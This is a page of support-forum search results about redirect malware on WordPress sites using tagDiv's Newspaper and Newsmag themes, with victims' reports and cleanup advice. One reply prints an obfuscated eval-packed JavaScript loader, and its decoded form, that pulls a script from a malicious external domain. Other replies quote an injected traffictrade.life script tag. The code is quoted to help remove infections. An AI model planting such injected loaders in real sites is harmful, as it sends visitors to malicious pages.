Search Results for 'Malware'

    No search results were found in Documentation!

Results from the Forum
fpb-ge
Participant
#0

Hello,

On my website, I have a malware with redirection to advertising pages.
Wordfence tell me that I have in the theme/template options at line ‘ td_011 ‘ the following virus link: js.givemealetter.biz

I think … I have to find this line to erase this spurious address.

Have you ever encountered the same problem?

Where I need to go to find precisely this line ‘ td_011 ‘ ?

There I am stuck!

I have this problem on two websites that relate to NewsPaper7.
I still have two other sites with this same template.
And I have two other websites waiting.

So big problem.

help me !

fpb-ge
Participant
#0

Hello,

On my website, I have a malware with redirection to advertising pages.
Wordfence tell me that I have in the theme/template options at line ‘ td_011 ‘ the following virus link: js.givemealetter.biz

I think … I have to find this line to erase this spurious address.

Have you ever encountered the same problem?

Where I need to go to find precisely this line ‘ td_011 ‘ ?

There I am stuck!

I have this problem on two websites that relate to NewsPaper7.
I still have two other sites with this same template.
And I have two other websites waiting.

So big problem.

help me !

Bogdan B.
tagDiv Staff

Hello,
The code does not disable itself. The theme code needs activation ONCE and that’s it. You have a problem that resets the database most likely. Either it’s a malware or a plugin that needs resetting those fields. I can’t say for sure but it’s not a theme related issue. There is an external influence over the db fields where the activation is kept. The theme only resets the key activation if the reset key button is pressed in the system status screen.
Please only use tested and recommended plugins and clean your WP install of any malware.

The only tested and recommended plugins to use with our theme are these ones:

WP Super Cache- caching plugin
Contact form 7- used to make contact forms
bbPress- forum plugin
BuddyPress- social network plugin
Font Awesome 4 Menus- icon pack, supported in the theme menus
Jetpack- plugin with lots of features *it may slow down your site
WooCommerce- eCommerce solution
WordPress (Yoast) SEO- SEO plugin
Wp User Avatar- Change users avatars

Anything beyond this list is not tested and I cannot say for sure if it will work or not.

Also please make sure your system status parameters are set according to this guide:
https://forum.tagdiv.com/system-status-parameters-guide/

Thank you!

bso
Participant
#0

I have Newspaper version 6.7 nad I have problem with header ad and inserting malware code. Where can I find update from 6.7 do 6.72?

3DP.Lighting
tagDiv Member

Hi Andrex,

Finally your tips did me help to detect the suspicious malware, which was, indeed, placed in the Ad section / Header. So your first assumption was right!

All is removed and replaced now with the correct codes, passwords changed etc.

Thanks so much for offering your help, it is greatly appreciated, hope I will be back in Google soon (and removed from any blacklists…).

Have a wonderful weekend and, again, thank you for your warm support!

Best regards,
Marco

EricWhittakerJr
tagDiv Member

I have turned off the Tag Div Social counter plugin
Turned off sharing in post settings
Turned off social icons in the header settings

There aren’t any javascript pop ups added to the site

We use slider revolution for the front page but I disabled that and the page still did not load

I do not have any plugins running other than

tagDiv Composer
Slider Revolution (Disabled and tested no change)
Jetpack by WordPress.com (Disabled and tested no change)
Akismet Anti-Spam (Disabled and tested no change)

I checked for malware and the only files that were changed were by GoDaddy
Those files are

gd-config.php (GoDaddy added for their configuration)
wp-admin/install.php (Removed for security should not effect theme)
wp-config-sample.php (Removed for security should not effect theme)
wp-admin/includes/upgrade.php (Removed for security should not effect theme)

What should I do now

simchris
tagDiv Member

Try disabling
a) queries to FB/Twitter for ‘number of shares’
b) any javascript pop-ups

try disabling any plugins not included with theme

scan site with Securi site scanner for malware

3DP.Lighting
Participant
#0

Hi,

I have an urgent problem to solve: my blog http://www.3dprinting.lighting (using Newsmag template) has been performing well for nearly 3 years. Now, at once, it is forwarded to another fraudulent website and my complete site has disappeared from the web.

My hosting provider spent over 2 days to work through the wordpress environment and tried to find a solution, with zero result. There’s no malware or frauduleus scripts been found, they think the script (the referral) comes from somewhere outside, and is brought in from time to time in one of the website scripts. As they are not malware expert or WordPress specialists, it is just guessing what’s going on. Resulting from this, my blog is completely whipped out from the search engine (Google) and Adsense earnings declined.

I need urgent help from a professional to solve this problem as my hosting company after two days of trying is not able to solve it.

With kind regards,
Marco de Visser

Simion C.
tagDiv Staff

Hi,

The theme is fully tested and works properly. It does not contain any malware or redirects to other websites. Only use the theme downloaded from themeforest not from other sources, like Chris mentioned. If you checked the database with the security solutions provided by Chris, install the theme again and see if the problem is still happening
https://forum.tagdiv.com/install-via-ftp/
Remove all other plugins except the ones that come with the theme, in the theme package. Do not use any custom code in the theme panel or directly in the theme files. Do not activate any child theme you might have.

Thanks

simchris
tagDiv Member

Fix the website?

Look at content for bad ads, deceptive information presented, bad ad/links, etc.

If content is ‘okay’ — also check:

a) make sure https enabled
b) scan with securi free web scanner

*MALWARE FOUND*
https://sitecheck.sucuri.net/results/halaja.org

c) check the Google search console (webmaster tools) for warnings
d) check home page with F12/console in Chrome for warning

e) possibly do a black list and DNS poisoning test:
https://mxtoolbox.com/domain/

* WARNINGS
https://mxtoolbox.com/domain/halaja.org/

also see:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/

makkis001
tagDiv Member

Thanks for the guides, they are very basic but provide a good guideline, not enough when you are trying to remove a malware. In my case I had an entry on the header.php (easy to spot and remouve) but also a js script was inserted into theme panel custom js of Newsmag theme. It was an harmful script and was loading a js.trysomethingnew.eu that was redirecting to malicious website. It’s a Newsmag theme vulnerability, so I have updated the theme into latest version.

  • This reply was modified 8 years by makkis001.
Bogdan B.
tagDiv Staff

Hello,

This seems like a very strange issue. The theme does not reset itself. Are you sure you are not changing demos? Installing a new demo with demo content can have this result: https://forum.tagdiv.com/installing-demos/
A demo is imported with the settings as well as the dummy data so your settings will reset when installing a demo.
Other than that, the theme will not reset itself unless you have errors in the database or malware that is constantly refreshing the database.

I recommend cleaning up your wp install by using the many guides online on how to do it.
Also make sure you meet the minimum requirements for the theme:
https://forum.tagdiv.com/requirements-for-newspaper/
https://forum.tagdiv.com/requirements-for-newspaper/

Thank you!

simchris
tagDiv Member

Forgot to include this article, also:
https://www.wordfence.com/blog/2017/08/traffictrade-malware/

attackers modify your wp_options table to inject the malicious code into that table

What TrafficTrade Malware Does On Your Site
Once you have been infected with TrafficTrade, it injects Javascript onto your site that loads from the TrafficTrade.life domain. The actual script is very simple.
It redirects your visitors to a ‘trafficreceiver’ domain which then does further redirects to whichever campaign they are running. In the case of my test, you are redirected to a site that wants you to install a Chrome plugin – most likely malicious.

Seems this IP range would be useful to block:
79.110.128.0 – 79.110.135.255

<hr>
HOW TO CLEAN DBASE!
https://wpfixit.com/traffictrade-wordpress-infection/

REMOVE INFECTION SCRIPT FROM SITE

The goal here is to track down where the script we mentioned above exists and them remove all traces of it. The scanning we did in the previous step will likely show you what files on your site have this script but it will not show you where in the database it remains.

Run Search and Replace Using a Plugin
Our favorite search and replace plugin is Better Search Replace. Install and active this plugin to search and replace database content. You would simply run a search for the script above and replace it with an empty filed.

Run Search and Replace Using a SQL Query
To do this, you will need phpMyAdmin access. This access allows you entry to edit the database that your WordPress site runs on. Once you have this you will run the SQL Query below which will search the entire database for the bad script and remove it.

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;

  • This reply was modified 8 years by simchris.
Bogdan B.
tagDiv Staff

Hello,

Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.

The old version from prior to April 2016 had a security issue which was patched in 6.7.2. Similarly WordPress prior to 4.7 is insecure.

Please make sure you update your theme, plugins and WordPress and do not stick to old versions.

If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Here is a link for best WordPress security practices created by Chris S:

https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/

Thank you!

Catalin
tagDiv Staff

Hello brtaydn,

Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.

Please make sure you update your theme, plugins, and WordPress and do not stick to old versions.

If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:

http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Here is a link for best WordPress security practices created by Chris S:

https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/

Thank you!

bernienor
Participant
#0

Hi!
unfortunately we got struck by the traffictrade malware earlier this summer. (Our own mistake due to a customzied 3 party ad system). However – we are up and running and everything is dandy. We are now on the latest Newspaper (8.1?) and all patched up. Got Wordfence premium running etc.

Then we get one critical warning from Wordfence about an “TD_008” content in wp_options. I also find this one occurence when searching in phpmyadmin. There is no findings of that in the Ad system of the Newspaper 8 theme – so I’m thinking this might be some old obsolete options setting from Newspaper 4 to 8? (yes I’m shamefull ^^)

Do I delete this line in “TD_008” or what to do?

Have a good one!
B

theoharis
tagDiv Member

Hi,

Chris and mhendiz thanks for your advice, I’ve had already done all of your suggestions.
Finally I think I’ve resolved the issue. Here’s my thoughts:

Just before the beginning of my clean-up procedure the malware moved the script to
WP Admin > Newspaper > Theme panel > Custom Code > Custom Javascript

I found the following JS in this field:


eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))

If you unpack the above, you’ll get:


var script = document.createElement('script');
script.src = 'https://js.trysomethingnew.eu/analytics.js';
document.getElementsByTagName('head')[0].appendChild(script);

So that’s why I couldn’t find the infection in the db.

The first stage of the infection included the following in the WP Admin > Newspaper > Theme panel > Header Ad:


<script src='https://blue.traffictrade.life/main.js' type='text/javascript'></script>

I hope now that I’ve installed fresh copies of WP, theme and plugins the issue will be resolved.

You can also check this post, if you encounter the same issue with old versions of Newspaper theme: https://productforums.google.com/forum/#!topic/webmasters/u5mYsV6gVdg

simchris
tagDiv Member

Well, if you install a ‘clean copy’ of the theme, and then it gets re-infected, then there is some malicious code on your site, or the overall site has been hacked.

Did you also remove any child theme if using one?

The version on ThemeForest is not infected.

Did you change *all* your passwords for WP, FTP, and your hosting panel?

Did you try going to an older dbase backup not infected?

We’re not having this issue on any of our sites, so not sure what to tell you beyond that.

I’m assuming you’ve done all the tutorials:
https://aw-snap.info/articles/malware-of-the-day.php

https://www.wordfence.com/blog/2017/08/traffictrade-malware/

http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/

https://codex.wordpress.org/FAQ_My_site_was_hacked

https://sucuri.net/guides/how-to-clean-hacked-wordpress

http://danfennell.com/2017/07/24/traffictrade-life-malware-removal/

(I don’t work here.)

  • This reply was modified 8 years by simchris.
theoharis
tagDiv Member

Hi,

Yes, I’ve done what you’ve described.
Sucuri site scanner does not catch the malware, it shows it’s ok.
But the redirection insists.

Thank you.

simchris
tagDiv Member

Did you do a full clean install of WP, deleting old version entirely?
Delete entirely all plugins and themes.
Check your htaccess for malicious entries.
Check folders, like the uploads folder for rogue php files?

Again: did you do a full proper install of Newspaper 8.1; meaning DELETE old theme folder entirely, upload NEW fresh copy — not over-writing which leaves old code there.

Scan site with Securi?

Follow online tutorials to check dbase for the malware infection?

Did you delete items in the ad boxes in theme and resave per the common tutorials online?

  • This reply was modified 8 years by simchris.
theoharis
tagDiv Member

Hi,

As you can see in my message:

Please note the facts:

I have the latest updates of WordPress core, all plugins and Newspaper 8.1.

There are no other deactivated themes or plugins on my installation (except Twenty Seventeen).

There is no sign of traffictrade malware in the db.

There is no sign of traffictrade malware in the source code.

I do not have the searchreplacedb2.php script on my server.

I have the latest Wordfence (and WAF) installed & configured.

Please keep in mind that I’ve tested the same installation to different servers.
I’ve also tested with all WP core, plugins and themes files fresh downloaded and replaced.

My site still redirects to spam sites.

When I deactivate all plugins the site redirects.
When I deactivate all plugins and activate the Twenty Seventeen theme the site is ok.
When I activate all plugins and activate the Twenty Seventeen theme the site is ok.

So my conclusion is that something goes wrong with Newspaper 8.1 theme.

Any suggestions?

Thank you.

Catalin
tagDiv Staff

Hello theoharis,

Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.

The old version from prior to April 2016 had a security issue which was patched in 6.7.2. Similarly, WordPress prior to 4.7 is insecure.

Please make sure you update your theme, plugins, and WordPress and do not stick to old versions.

If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:

http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Here is a link for best WordPress security practice created by Chris S:

https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/

Thank you!

Viewing 25 results - 501 through 525 (of 681 total)